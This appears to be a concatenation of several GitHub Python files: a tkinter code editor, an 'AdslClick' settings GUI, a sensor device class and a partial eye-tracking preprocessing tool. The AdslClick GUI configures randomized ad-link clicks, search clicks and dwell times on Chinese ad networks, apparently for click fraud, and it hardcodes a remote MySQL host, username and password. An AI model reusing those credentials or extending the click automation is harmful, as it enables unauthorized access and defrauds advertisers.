\"Do you want to save the file \\\"%s\\\"?\" % filename\n result = messagebox.askyesnocancel(\"Exit\", msg, default=\"yes\")\n if result is None:\n return \"break\"\n elif result:\n text_widget_wrapper.save()\n\n def close_tab(self, idx=None, event=None):\n if idx is None:\n idx = self.notebook.current_tab\n if self.ask_close_tab(idx) == \"break\":\n return \"break\"\n else:\n self.notebook.delete_tab(idx, event)\n del self.tabs[idx]\n\n def add_tab(self, state=None):\n frame = tk.Frame(self.notebook, bd=0, highlightthickness=0)\n idx = self.notebook.add(frame, text=\"Untitled\")\n text_widget = 
CPPText(frame, bg=BG_COLOUR, fg=FG_COLOUR,\n font=FONT, height=HEIGHT, width=WIDTH)\n text_widget.pack(fill=\"both\", expand=True)\n text_widget.insert(\"end\", SAMPLE_CODE)\n text_widget_wrapper = RunnableText(text_widget, idx,\n self.change_tab_text,\n self.ask_close_tab)\n self.tabs.update({idx: (text_widget, text_widget_wrapper)})\n if state is not None:\n text_widget_wrapper.set_state(state)\n self.notebook._set_active(self.notebook.next_idx - 1)\n return idx\n\n def change_tab_text(self, idx, name):\n self.notebook.rename(idx, name)\n\n def close_app(self):\n # Save the state\n state = {\"this\": self.get_state()}\n for idx, (text_widget, text_widget_wrapper) in self.tabs.items():\n state.update({\"tab %i\" % idx: text_widget_wrapper.get_state()})\n with open(\"state.state\", \"wb\") as file:\n file.write(pickle.dumps(state))\n\n # Close the notebook and root\n self.notebook.destroy()\n self.root.destroy()\n\n def open_app(self, state):\n this_state = state.pop(\"this\")\n self.set_state(this_state)\n for key, value in state.items():\n self.add_tab(state=value)\n\n def get_state(self):\n return {\"explorer\": self.explorer.get_state(),\n \"explorer_width\": self.explorer.master_frame.winfo_width()}\n\n def set_state(self, state):\n explorer_state = state.pop(\"explorer\")\n self.explorer.set_state(explorer_state)\n width = state.pop(\"explorer_width\", 200)\n self.explorer.config(width=width)\n self.explorer.resize(\"fit_width\")\n if len(state) > 0:\n print(\"[App] Didn't handle this part of `state`:\", state)\n\n def change_settings(self, event):\n changer = ChangeSettings(self.root)\n\n def mainloop(self):\n self.root.mainloop()\n\n\nif __name__ == \"__main__\":\n app = App()\n app.mainloop()\n","repo_name":"TheLizzard/Bismuth-184","sub_path":"src/main.pyw","file_name":"main.pyw","file_ext":"pyw","file_size_in_byte":7412,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"24733724623","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\nfrom tkinter import messagebox\nimport tkinter as tk\nimport pymysql\nimport logging\ndef log():\n logger = logging.getLogger('Server')\n logger.setLevel(logging.INFO)\n fmt = logging.Formatter('%(name)s-->%(asctime)s-->%(message)s')\n fh = logging.FileHandler('ServerLog.txt', encoding='utf-8')\n\n sh = logging.StreamHandler()\n sh.setFormatter(fmt)\n fh.setFormatter(fmt)\n logger.addHandler(fh)\n logger.addHandler(sh)\n return logger\n\nroot = tk.Tk()\nroot.title(\"Login client test\")\nroot.geometry(\"550x340\")\n\n#LabelFrame 1: login and account info\nlf1 = tk.LabelFrame(root, text=\"Login info\", width=240, height=150)\nlf1.place(x=10, y=10)\n\n#login event\ndef usr_login():\n lg = log()\n lg.info(\"You clicked the login button!\")\n\n\ntk.Label(lf1, text=\"Username:\").place(x=5, y=5)\ntk.Label(lf1, text=\"Password:\").place(x=5, y=40)\ntk.Entry(lf1, text=\"\", width=20).place(x=75, y=5)\ntk.Entry(lf1, text=\"\", width=20, show=\"*\").place(x=75, y=40)\ntk.Button(lf1, text=\"Log in\", width=8, command=usr_login).place(x=30, y=80)\ntk.Button(lf1, text=\"Register\", width=8).place(x=140, y=80)\n\n\n\n#LabelFrame 2: log info display\nlf2 = tk.LabelFrame(root, text=\"Log info\", width=240, height=155)\nlf2.place(x=10, y=170)\n\n#LabelFrame 3\nlf3 = tk.LabelFrame(root, text=\"Settings 1\", width=270, height=150)\nlf3.place(x=270, y=10)\ntk.Label(lf3, text=\"Ad network:\", width=8, fg=\"blue\").place(x=5, y=5)\nssp = tk.IntVar()\nssp.set(3)\ntk.Radiobutton(lf3, text=\"Sogou network\", variable=ssp, value=1).place(x=5, y=30)\ntk.Radiobutton(lf3, text=\"Baidu network\", variable=ssp, value=2).place(x=98, y=30)\ntk.Radiobutton(lf3, text=\"360 network\", variable=ssp, value=3).place(x=188, y=30)\n\ntk.Label(lf3, text=\"Word list:\", width=8, fg=\"blue\").place(x=5, y=70)\nkeyword = tk.IntVar()\nkeyword.set(3)\ntk.Radiobutton(lf3, text=\"Word list 3\", variable=keyword, value=1).place(x=5, y=95)\ntk.Radiobutton(lf3, text=\"Word list 2\", variable=keyword, value=2).place(x=98, y=95)\ntk.Radiobutton(lf3, text=\"Word list 1\", variable=keyword, value=3).place(x=188, y=95)\n\n#LabelFrame 4\nlf4 = tk.LabelFrame(root, text=\"Settings 2\", width=270, height=120)\nlf4.place(x=270, y=170)\n\nadsclick1 = tk.IntVar() #number of ad link clicks 1\nadsclick1.set(\"3\")\nadsclick2 = tk.IntVar() #number of ad link clicks 2\nadsclick2.set(\"3\")\ntk.Label(lf4, text=\"Ad link clicks:\").place(x=5, y=0)\ntk.Entry(lf4, textvariable=adsclick1, width=3).place(x=120, y=0)\ntk.Label(lf4, text=\"~ (random)\").place(x=145, y=0)\ntk.Entry(lf4, textvariable=adsclick2, width=3).place(x=160, y=0)\n\nsearchclick1 = tk.IntVar() #number of search result clicks 1\nsearchclick1.set(\"1\")\nsearchclick2 = tk.IntVar() #number of search result clicks 2\nsearchclick2.set(\"3\")\ntk.Label(lf4, text=\"Search result clicks:\").place(x=5, y=25)\ntk.Entry(lf4, textvariable=searchclick1, width=3).place(x=120, y=25)\ntk.Label(lf4, text=\"~ (random)\").place(x=145, y=25)\ntk.Entry(lf4, textvariable=searchclick2, width=3).place(x=160, y=25)\n\ndelaytime1 = tk.IntVar() #browser window dwell time 1\ndelaytime1.set(\"60\")\ndelaytime2 = tk.IntVar() #browser window dwell time 2\ndelaytime2.set(\"300\")\ntk.Label(lf4, text=\"Page dwell time:\").place(x=5, y=50)\ntk.Entry(lf4, textvariable=delaytime1, width=3).place(x=120, y=50)\ntk.Label(lf4, text=\"~ (seconds)\").place(x=145, y=50)\ntk.Entry(lf4, textvariable=delaytime2, width=3).place(x=160, y=50)\n\ntimeryear = tk.IntVar() #timer: year\ntimeryear.set(\"2018\")\ntimermonth = tk.IntVar() #timer: month\ntimermonth.set(\"3\")\ntimerday = tk.IntVar() #timer: day\ntimerday.set(\"4\")\ntimerhour = tk.IntVar() #timer: hour\ntimerhour.set(\"8\")\ntimerbranch = tk.IntVar() #timer: minute\ntimerbranch.set(\"0\")\ntk.Label(lf4, text=\"Scheduled time: - - : (timer)\").place(x=5, y=75)\ntk.Entry(lf4, textvariable=timeryear, width=4).place(x=79, y=75)\ntk.Entry(lf4, textvariable=timermonth, width=2).place(x=120, y=75)\ntk.Entry(lf4, textvariable=timerday, width=2).place(x=148, y=75)\ntk.Entry(lf4, textvariable=timerhour, width=2).place(x=172, y=75)\ntk.Entry(lf4, textvariable=timerbranch, width=2).place(x=200, y=75)\n# save\ntk.Button(root, text=\"Save\", width=6).place(x=270, y=295)\ntk.Button(root, text=\"Start\", width=6).place(x=344, y=295)\ntk.Button(root, text=\"Pause\", width=6).place(x=415, y=295)\ntk.Button(root, text=\"Stop\", width=6).place(x=487, y=295)\n# hide a widget\n# lf1.pack_forget()\nroot.mainloop()\n\n\n# open the database connection\ndb = pymysql.connect(\"122.114.13.199\", \"360Click\", \"LOVElove12354\", \"360Click\", charset='utf8')\n\n#create a cursor object with cursor()\ncursor = db.cursor()\n#execute the SQL statement with execute()\ncursor.execute(\"SELECT * FROM python_user\")\n\n#use fetchall() to get all the rows\ndata = cursor.fetchall()\n\n#print the fetched data\nprint(data)\n\n#close the cursor and the database connection\ncursor.close()\ndb.close()\n","repo_name":"falwiw/PycharmProjects","sub_path":"Other - 副本/AdslClick/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4855,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"42993810463","text":"import numpy as np\n\nclass SensorDevice(object):\n '''\n classdocs\n '''\n DEVICE_PREFIX = \"hci\"\n DEC_PRECISION = 8\n \n cluster_id = \"\"\n sensor_id = \"\"\n device_name = \"\"\n device_num = -1\n device_type = \"\"\n device_bus = \"\"\n mac_address = \"\"\n is_up = False\n status = \"\"\n degrees_turned = 0\n distance_from_base = 
0\n    height_from_ground = 0\n    \n    _params = None\n    _x_set = False\n    _y_set = False\n    _x = 0.0\n    _y = 0.0\n\n    @staticmethod\n    def create_from_data_list(data_list, params):\n        rval = SensorDevice(params)\n        for ln in data_list:\n            vals = ln.split(\" \")\n            if (ln[0:len(SensorDevice.DEVICE_PREFIX)] == SensorDevice.DEVICE_PREFIX):\n                # device line\n                subvals = vals[0].split(\":\")\n                rval.device_name = subvals[0]\n                rval.device_num = int(rval.device_name[len(SensorDevice.DEVICE_PREFIX):len(rval.device_name)])\n                rval.device_type = vals[1]\n                rval.device_bus = vals[4]\n            elif (ln[0:2] == \"BD\"):\n                rval.mac_address = vals[2]\n            elif ((ln[0:2] == \"UP\") or (ln[0:4] == \"DOWN\")):\n                if (vals[0] == \"UP\"):\n                    rval.is_up = True\n                else:\n                    rval.is_up = False\n        \n        return rval\n    \n    @staticmethod\n    def cluster_from_sensor_id(sensor_id:str):\n        rval = ''\n        if (sensor_id is None):\n            return rval\n        elif (sensor_id == ''):\n            return rval\n        indx = sensor_id.find('_')\n        rval = sensor_id[0:indx]\n        return rval\n    \n    @property\n    def X(self):\n        if (not self._x_set):\n            an = np.deg2rad(self.degrees_turned - 90)\n            self._x = round(self.distance_from_base * np.cos(an),self.DEC_PRECISION)\n            self._x_set = True\n        return self._x\n    \n    @property\n    def Y(self):\n        if (not self._y_set):\n            an = np.deg2rad(self.degrees_turned + 90)\n            self._y = round(self.distance_from_base * np.sin(an), self.DEC_PRECISION)\n            self._y_set = True\n        return self._y\n    \n    @property\n    def Z(self):\n        return self.height_from_ground\n    \n    def to_bytes(self, delimiter:str):\n        return self.cluster_id + \\\n            delimiter + \\\n            self.sensor_id + \\\n            delimiter + \\\n            self.device_name + \\\n            delimiter + \\\n            str(self.device_num) + \\\n            delimiter + \\\n            self.device_type + \\\n            delimiter + \\\n            self.device_bus + \\\n            delimiter + \\\n            self.mac_address + \\\n            delimiter + \\\n            str(self.is_up) + \\\n            delimiter + \\\n            self.status + \\\n            delimiter + \\\n            str(self.degrees_turned) + \\\n            delimiter + \\\n            str(self.distance_from_base) + \\\n            delimiter + \\\n            str(self.height_from_ground)\n\n    def __init__(self, params):\n        '''\n        Constructor\n        '''\n        self._params = params\n        \n        return","repo_name":"darkernoise/AeroTracker","sub_path":"aero_tracker/sensor/sensor_device.py","file_name":"sensor_device.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14914019497","text":"import sys, traceback\nimport argparse\nimport numpy as np\nimport pickle\nimport easydict\nimport copy\nimport json\nimport csv\nimport os\n\nimport preprocessing\nfrom edfreader import read_edf\n\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtWebEngineWidgets import *\n\nfrom bokeh.plotting import *\nfrom bokeh.models import *\nfrom bokeh.transform import *\nfrom bokeh import events\nfrom bokeh import palettes\nfrom bokeh.resources import CDN\nfrom bokeh.embed import file_html\nfrom bokeh.layouts import row, column\n\nDATA = {}\nMETADATA = {}\n\n\ndef JsonLoadsCheck(read, origin):\n    # This function simply reads JSON, and makes sure a wrong file will not crash the program\n    try:\n        return json.loads(read)\n    except json.decoder.JSONDecodeError:\n        origin.log.insertPlainText('ERROR : JSON READ ERROR(The JSON contains mistakes : Replaced content with empty dict, might cause errors)\\n')\n        return dict()\n\n\ndef GetNestedDic(dic, keys):\n    # A tiny function to get values from dictionaries nested into each other using a list of strings like an address\n    # If the dictionary doesn't exist, 
it creates an empty one\n for key in keys:\n try:\n dic = dic[key]\n except KeyError:\n dic[key] = dict()\n dic = dic[key]\n return dic\n\n\ndef SortPlotVariables(origin, settings):\n # This functions checks what variables are available for plottings and adds them as plottable variables\n # The condition being that the length of a list of numbers, must be the same as the length of time\n def rec_check(plot_variables, settings, lg, addr):\n for setting in settings:\n var = GetNestedDic(origin.CleanDATA[0], (addr + setting).split('.'))\n if type(var) is dict:\n rec_check(plot_variables, list(var.keys()), lg, setting + '.')\n elif type(var) is np.ndarray:\n if len(var) == lg:\n plot_variables.append(addr + setting)\n elif type(var) is list and var:\n if type(var[0]) in [int, float] and len(var) == lg:\n plot_variables.append(addr + setting)\n\n if 'time' not in settings:\n origin.check = False\n return\n origin.check = True\n lg = len(origin.CleanDATA[0]['time'])\n plot_variables = list()\n rec_check(plot_variables, settings, lg, '')\n\n origin.lock = True\n origin.plot_variables = plot_variables\n origin.dpdw1.clear()\n origin.dpdw2.clear()\n origin.dpdw3.clear()\n origin.dpdw1.addItems(origin.plot_variables)\n origin.dpdw2.addItems(origin.plot_variables)\n origin.dpdw3.addItems(origin.plot_variables)\n origin.lock = False\n\n\ndef FillTree(widget, value):\n # This function clears a PyQt Tree Widget, and then fills it with a dictionnary effectively updating it\n # It then calls a recursive function to go through the entire dictionnary and adds in every individual item\n def filltreeitem(item, value):\n item.setExpanded(True)\n i = 0\n if type(value) in [dict, easydict.EasyDict]:\n for key, val in value.items():\n child = QTreeWidgetItem()\n child.setText(0, str(key))\n item.addChild(child)\n filltreeitem(child, val)\n elif type(value) is list:\n for val in value:\n i += 1\n child = QTreeWidgetItem()\n item.addChild(child)\n if type(val) in [dict, easydict.EasyDict]:\n child.setText(0, str(i) + ' - [dict]')\n filltreeitem(child, val)\n elif type(val) is list:\n child.setText(0, str(i) + ' - [list]')\n filltreeitem(child, val)\n else:\n child.setText(0, str(val))\n child.setExpanded(True)\n else:\n child = QTreeWidgetItem()\n child.setText(0, str(value))\n item.addChild(child)\n widget.clear()\n filltreeitem(widget.invisibleRootItem(), value)\n\n\ndef UpdatePlot(origin):\n def assigncdsvalues(origin, idx):\n cdsvalues = {}\n texts = [origin.dpdw1.currentText(),\n origin.dpdw2.currentText(), origin.dpdw3.currentText()]\n for k in texts:\n cdsvalues[k] = GetNestedDic(origin.CacheDATA[idx], k.split('.'))\n return cdsvalues\n w = 500\n h = 500\n # Check some conditions to make that the plot can be created\n if origin.lock is True:\n return\n elif origin.check is False:\n origin.htmlreader.setHtml('The time must be selected in order to generate the plot!')\n return\n elif len(origin.plot_variables) == 0:\n origin.htmlreader.setHtml('No readable value selected!')\n return\n idx = origin.index.value() - 1\n # Creates a new filtered ColumnDataSource (custom data format for bokeh) with a copy of the selected values\n cdsvalues = assigncdsvalues(origin, idx)\n\n # Creates the color range\n color = linear_cmap(origin.dpdw3.currentText(), 'Plasma256',\n np.nanmin(cdsvalues[origin.dpdw3.currentText()]),\n np.nanmax(cdsvalues[origin.dpdw3.currentText()]))\n # Set the name of the plot axis according to\n # the selected values in x and y axis\n xaxis = origin.dpdw1.currentText()\n yaxis = 
origin.dpdw2.currentText()\n # Create the Bokeh plot, and adds the values as dots inside of it.\n p = figure(plot_width=w, plot_height=h, toolbar_location=\"above\",\n tools='pan,wheel_zoom,box_zoom,reset,hover,crosshair')\n plot = column(p, width=w, height=h)\n p.circle(x=xaxis, y=yaxis, source=cdsvalues, line_color=color, fill_color=color)\n # Put label with the name of selected axis on the plot + flip if need be\n p.xaxis.axis_label = xaxis.upper()\n p.yaxis.axis_label = yaxis.upper()\n p.y_range.flipped = origin.flipy.isChecked()\n # Transforms the bokeh plot into an HTML file,\n # and assign this file to the PyQt HTML reader\n html = file_html(plot, CDN)\n origin.htmlreader.setHtml(html)\n\n\ndef Cleaner(origin, data, settings, addr):\n # Recursive functions goes throught a dictionnary (CleanData, wich is initially a copy of CacheData)\n # Then it reads all the selected variables, checking what is selected or not\n # Finally it removes every unwanted variables that wasn't selected by the user\n # (Like unselected Data that was calculated because it was needed for a selected one)\n tmp = copy.copy(data)\n for elem in tmp:\n if type(tmp) is not dict:\n Cleaner(origin, elem, settings, '')\n else:\n var = GetNestedDic(origin.variables, (addr + elem).split('.'))\n if (list(var.keys()) != ['desc', 'func', 'name', 'reqs']):\n Cleaner(origin, tmp[elem], settings, addr + elem + '.')\n if not data[elem]:\n del data[elem]\n elif addr + elem not in settings:\n del data[elem]\n\n\ndef ComputeVariable(origin, setting, dic):\n def ChangeValue(dic, val, keys):\n for key in keys:\n if key != keys[-1]:\n try:\n dic = dic[key]\n except KeyError:\n dic[key] = dict()\n dic = dic[key]\n else:\n dic[key] = val\n\n reqs = GetNestedDic(origin.variables, (setting + '.reqs').split('.'))\n for req in reqs:\n reqval = GetNestedDic(dic[0], req.split('.'))\n if type(reqval) is np.ndarray:\n if reqval.size == 0:\n tmp = ComputeVariable(origin, req, dic)\n if tmp:\n return (tmp + ' for ' + setting)\n elif not reqval:\n tmp = ComputeVariable(origin, req, dic)\n if tmp:\n return (tmp + ' for ' + setting)\n\n funcstr = GetNestedDic(origin.variables, (setting + '.func').split('.'))\n if funcstr == {}:\n return (setting)\n if funcstr == 'NONE':\n return\n function = getattr(preprocessing, funcstr)\n\n for k in dic:\n args = []\n for req in reqs:\n args.append(GetNestedDic(k, req.split('.')))\n try:\n value = function(*args)\n if value:\n ChangeValue(k, value, setting.split('.'))\n except (TypeError, ValueError, IndexError) as e:\n origin.log.insertPlainText('ERROR for ' + funcstr + ' at setting ' + setting + '\\n' + traceback.format_exc())\n return\n\n\ndef CreateVariables(origin, data, settingslist):\n ret = copy.deepcopy(data)\n for setting in settingslist:\n check = GetNestedDic(origin.variables, setting.split('.'))\n if type(check) is dict:\n if (list(check.keys()) != ['desc', 'func', 'name', 'reqs']):\n continue\n tmp = ComputeVariable(origin, setting, ret)\n if tmp:\n return tmp\n return ret\n\n\ndef GatherSettings(origin):\n def recurse(parent_item, parent_str):\n for i in range(parent_item.childCount()):\n child = parent_item.child(i)\n grand_children = child.childCount()\n if grand_children > 0:\n recurse(child, parent_str + child.text(0) + '.')\n if child.checkState(0) == Qt.Checked:\n checked_items.append(parent_str + child.text(0))\n\n checked_items = []\n recurse(origin.selecttree.invisibleRootItem(), \"\")\n origin.settings = checked_items\n\n\ndef PushApply(origin):\n # This function is called whenever the 
user clicks on the Apply button, starting the creation of a data structure\n def CheckUserInput(k, origin):\n if 'Screen' in DATA[k][0]:\n bol = False\n bswc, bshc, bvd = False, False, False\n if 'screen_width_cm' not in DATA[k][0]['Screen']:\n bswc = True\n swc = QInputDialog.getDouble(origin, 'INPUT REQUIRED : Screen Width in cm', k + ':\\nScreen Width in cm',\n 1, -2147483647, 2147483647, 3)\n if 'screen_height_cm' not in DATA[k][0]['Screen']:\n bshc = True\n shc = QInputDialog.getDouble(origin, 'INPUT REQUIRED : Screen Height in cm', k + ':\\nScreen Height in cm',\n 1, -2147483647, 2147483647, 3)\n if 'viewing_Distance_cm' not in DATA[k][0]['Screen']:\n bvd = True\n vd = QInputDialog.getDouble(origin, 'INPUT REQUIRED : User/Screen distance in cm', k + ':\\nUser/Screen distance in cm',\n 1, -2147483647, 2147483647, 3)\n else:\n bol = True\n bswc, bshc, bvd = True, True, True\n swc = QInputDialog.getDouble(origin, 'INPUT REQUIRED : Screen Width in cm', k + ':\\nScreen Width in cm',\n 1, -2147483647, 2147483647, 3)\n shc = QInputDialog.getDouble(origin, 'INPUT REQUIRED : Screen Height in cm', k + ':\\nScreen Height in cm',\n 1, -2147483647, 2147483647, 3)\n vd = QInputDialog.getDouble(origin, 'INPUT REQUIRED : User/Screen distance in cm', k + ':\\nUser/Screen distance in cm',\n 1, -2147483647, 2147483647, 3)\n for j in DATA[k]:\n if bol is True:\n j['Screen'] = dict()\n if bswc is True:\n j['Screen']['screen_width_cm'] = swc[0]\n if bshc is True:\n j['Screen']['screen_height_cm'] = shc[0]\n if bvd is True:\n j['Screen']['viewing_Distance_cm'] = vd[0]\n\n def LoadMetadata(origin, data):\n def rec_remove_list(dic, datalen, idx):\n for key, item in dic.items():\n if type(item) is dict:\n rec_remove_list(item, datalen, idx)\n elif type(item) is list:\n lg = len(item)\n if lg == datalen:\n dic[key] = item[idx]\n datalen = len(data)\n for elem in METADATA:\n i = 0\n while i < datalen:\n tmp = copy.copy(METADATA[elem])\n rec_remove_list(tmp, datalen, i)\n data[i].update(tmp)\n i += 1\n\n # Check if there is any data loaded\n if not DATA:\n origin.log.insertPlainText('ERROR : NO DATA (You either have not loaded any data files, or data did not read correctly)\\n')\n return\n # Read the selected settings in the variable trees, creating a list of adresses, used later or for calculations\n GatherSettings(origin)\n # Create or reset the CacheDATA\n origin.CacheDATA = []\n for k in DATA:\n # For every loaded data file: Add all the Metadata, ask what is the screen size in cm and user distance\n LoadMetadata(origin, DATA[k])\n CheckUserInput(k, origin)\n # Creates the data structure, and then check if there is no error returned, if not, adds it to CacheData\n tmp = CreateVariables(origin, DATA[k], origin.settings)\n if type(tmp) is str:\n origin.log.insertPlainText('ERROR : MISSING REQUIREMENT :' + tmp + '(Your loaded files do not have the required data needed for calculations)\\n')\n return\n else:\n origin.CacheDATA += tmp\n # When all computation is done, creates copy of CacheData, and then call Cleaner on this copy, removing unwanted data\n origin.CleanDATA = copy.deepcopy(origin.CacheDATA)\n Cleaner(origin, origin.CleanDATA, origin.settings, '')\n # Create a \"tag\" data, allowing the user to comment every trial, tagging them to their liking\n for k in origin.CleanDATA:\n try:\n if not k['tag']:\n k['tag'] = None\n except KeyError:\n k['tag'] = None\n # Check the amount of trials for trial selection in plotting later on\n origin.index.setMaximum(len(origin.CacheDATA))\n # Clear and then fill the 
data structure preview tree\n    origin.prevtree.clear()\n    FillTree(origin.prevtree, origin.CleanDATA)\n    origin.prevtree.collapseAll()\n    # Sort which data is plottable and which is not, and then create the plot\n    SortPlotVariables(origin, origin.settings)\n    UpdatePlot(origin)\n\n\ndef PushReset(origin):\n    # This function is called whenever the user clicks on the Reset button\n    # It deletes and resets absolutely everything, be it loaded data, settings, metadata, or edf configuration\n    DATA.clear()\n    METADATA.clear()\n    origin.savesettings = []\n    origin.mdatafiles = ()\n    origin.datafiles = ()\n    origin.edfstart = None\n    origin.edfevents = []\n    origin.log.clear()\n    LoadSettings(origin)\n    ResetMetadata(origin)\n\n\ndef Export(origin):\n    # This function is called when the user wants to export the CleanDATA structure\n    # The jsonify class and the tsvify function are here to get rid of some Python-specific data formats,\n    # making the data code-agnostic and not Python only\n    class jsonify(json.JSONEncoder):\n        def default(self, obj):\n            if isinstance(obj, np.integer):\n                return int(obj)\n            elif isinstance(obj, np.floating):\n                return float(obj)\n            elif isinstance(obj, np.ndarray):\n                return obj.tolist()\n            else:\n                return super(jsonify, self).default(obj)\n\n    def tsvify(data):\n        for k in data:\n            if type(data) is dict:\n                if type(data[k]) in [list, tuple, dict]:\n                    tsvify(data[k])\n                elif type(data[k]) is np.ndarray:\n                    data[k] = data[k].tolist()\n                elif type(data[k]) is np.floating:\n                    data[k] = float(data[k])\n                elif type(data[k]) is np.integer:\n                    data[k] = int(data[k])\n            elif type(k) in [list, tuple, dict]:\n                tsvify(k)\n            elif type(k) is np.floating:\n                k = float(k)\n            elif type(k) is np.integer:\n                k = int(k)\n            elif type(k) is np.ndarray:\n                k = k.tolist()\n\n    # Ask the user where and under what name and format the file will be saved\n    addr = QFileDialog.getSaveFileName(directory='finalstructures', filter='Pickle format(*.pkl);;JavaScript Object Notation(*.json);;Comma Separated Values(*.csv);;Tabulation Separated Values(*.tsv)')\n    # Check what file format was selected and write the data structure accordingly\n    i, j = os.path.splitext(addr[0])\n    if j == '.pkl':\n        with open(addr[0], 'wb') as file:\n            f = pickle.Pickler(file)\n            f.dump(origin.CleanDATA)\n    elif j == '.json':\n        with open(addr[0], 'w') as file:\n            file.write(json.dumps(origin.CleanDATA, cls=jsonify))\n    elif j == '.tsv' or j == '.csv':\n        with open(addr[0], 'w') as file:\n            if j == '.tsv':\n                w = csv.DictWriter(file, origin.CleanDATA[0].keys(), delimiter='\\t')\n            else:\n                w = csv.DictWriter(file, origin.CleanDATA[0].keys())\n            tmp = copy.deepcopy(origin.CleanDATA)\n            tsvify(tmp)\n            w.writeheader()\n            w.writerows(tmp)\n\n\ndef OpenFile(origin, boot=False, clean=False):\n    # This function is used when the user wants to load data into the program\n    # readdata is used when an EDF (asc format) file is loaded in, reading the file and returning a Python dict\n    # updatevariables is a function that updates the selectable data list, adding anything that is new\n    def readdata(path):\n        while not origin.edfstart:\n            ret = QInputDialog.getText(origin, 'EDF READER SETTINGS', 'Trial separator message')\n            if ret[1] is True:\n                origin.edfstart = ret[0]\n        while not origin.edfevents:\n            ret = QInputDialog.getText(origin, 'EDF READER SETTINGS', 'List of User-defined events in the edf file (format example= \"event0,event1,event2,...\")')\n            if ret[1] is True:\n                origin.edfevents = ret[0].split(',')\n        return(read_edf(path, origin.edfstart, list_events=origin.edfevents))\n\n    def 
updatevariables(origin):\n def recursivecheck(newvars):\n for k in newvars:\n bol = True\n if type(newvars[k]) is dict:\n if list(newvars[k].keys()) == ['x', 'y']:\n bol = True\n else:\n bol = False\n recursivecheck(newvars[k])\n if bol is True:\n newvars[k] = dict()\n newvars[k]['desc'] = \"DATA\"\n newvars[k]['func'] = \"NONE\"\n newvars[k]['name'] = \"DATA\"\n newvars[k]['reqs'] = []\n\n def recursiveupdate(old, new):\n for k in old:\n if list(old[k].keys()) != ['desc', 'func', 'name', 'reqs']:\n if k in list(new.keys()):\n recursiveupdate(old[k], new[k])\n new[k].update(old[k])\n\n newvars = {}\n for k in DATA:\n newvars.update(DATA[k][0])\n tmp = copy.deepcopy(newvars)\n recursivecheck(tmp)\n recursiveupdate(origin.variables, tmp)\n origin.variables.update(tmp)\n SetTreeSettings(origin)\n\n # Check if the function was called at the start, wich loads in previously loaded data, when PRPG was closed\n if boot is True:\n if not origin.datafiles:\n return\n else:\n origin.datafiles = QFileDialog.getOpenFileNames(directory='data', filter='Data Format (*.asc *.pkl *.json)')\n # Check if the user is loading the Clear Data function, wich removes all loaded data before loading the new one\n if clean is True:\n DATA.clear()\n # Read the data with the appropriate function, returning a dictionnary\n # If the Data is an EDF (under asc format) file, it does have to call edfreader function\n for k in origin.datafiles[0]:\n with open(k, 'rb') as file:\n i, j = os.path.splitext(k)\n if j == '.json':\n DATA[k] = json.load(file, encoding='latin1')\n elif j == '.pkl':\n DATA[k] = pickle.load(file, encoding='latin1')\n else:\n DATA[k] = readdata(k)\n # Check if the Data exists and adds it in the program, otherwise don't add it, and put a message in the error log\n if DATA[k]:\n updatevariables(origin)\n else:\n del DATA[k]\n origin.log.insertPlainText('ERROR : COULD NOT FIND ANY TRIAL FOR FILE :' + i + '(The file may be wrong or the EDF Reader trial separator event is not set correctly)\\n')\n # Update the lists in the Data Manager\n UpdateDataLists(origin.datamanager, origin)\n\n\ndef OpenMetadata(origin, boot=False):\n # Very similar to OpenFile, but for Metadata files\n # loadseparatedvalues is called when csv or tsv files are loaded in and need to be sorted in a dictionnary\n def loadseparatedvalues(name, origin, j):\n data = list()\n if j == '.csv':\n with open(name, 'r') as file:\n tmp = csv.reader(file, delimiter=',')\n for line in tmp:\n data.append(line)\n elif j == '.tsv':\n with open(name, 'r') as file:\n tmp = csv.reader(file, delimiter='\\t')\n for line in tmp:\n data.append(line)\n names = copy.copy(data[0])\n del data[0]\n ret = dict()\n y = 0\n for k in names:\n ret[k] = []\n for i in data:\n ret[k].append(i[y])\n y += 1\n for k in ret:\n if len(ret[k]) == 1:\n ret[k] = ret[k][0]\n return ret\n\n def updatevariables(origin):\n def recursivecheck(newvars):\n for k in newvars:\n bol = True\n if type(newvars[k]) is dict:\n if list(newvars[k].keys()) == ['x', 'y']:\n bol = True\n else:\n bol = False\n recursivecheck(newvars[k])\n if bol is True:\n newvars[k] = dict()\n newvars[k]['desc'] = \"DATA\"\n newvars[k]['func'] = \"NONE\"\n newvars[k]['name'] = \"DATA\"\n newvars[k]['reqs'] = []\n\n def recursiveupdate(old, new):\n for k in old:\n if list(old[k].keys()) != ['desc', 'func', 'name', 'reqs']:\n if k in list(new.keys()):\n recursiveupdate(old[k], new[k])\n new[k].update(old[k])\n\n newvars = {}\n for k in METADATA:\n newvars.update(METADATA[k])\n tmp = copy.deepcopy(newvars)\n 
recursivecheck(tmp)\n        recursiveupdate(origin.variables, tmp)\n        origin.variables.update(tmp)\n        SetTreeSettings(origin)\n\n    if boot is True:\n        if not origin.mdatafiles:\n            return\n    else:\n        origin.mdatafiles = QFileDialog.getOpenFileNames(directory='data', filter='Metadata Format (*.pkl *.json *.tsv *.csv)')\n    for k in origin.mdatafiles[0]:\n        with open(k, 'rb') as file:\n            i, j = os.path.splitext(k)\n            if j == '.tsv' or j == '.csv':\n                METADATA[k] = loadseparatedvalues(k, origin, j)\n            elif j == '.pkl':\n                METADATA[k] = pickle.load(file, encoding='latin1')\n            else:\n                METADATA[k] = JsonLoadsCheck(file.read(), origin)\n    updatevariables(origin)\n    UpdateDataLists(origin.datamanager, origin)\n\n\ndef ResetMetadata(origin):\n    # Called in PushReset or when the user clicks on Reset Metadata, it simply removes all the Metadata\n    origin.variables = copy.copy(origin.safevariables)\n    METADATA.clear()\n    SetTreeSettings(origin)\n    UpdateDataLists(origin.datamanager, origin)\n\n\ndef SaveSettings(origin):\n    # Saves the currently selected settings in the variables tree widgets\n    GatherSettings(origin)\n    origin.savesettings = origin.settings\n\n\ndef LoadSettings(origin):\n    # Loads the saved settings, and then automatically selects items in the variables trees\n    def recurseclear(parent_item):\n        for i in 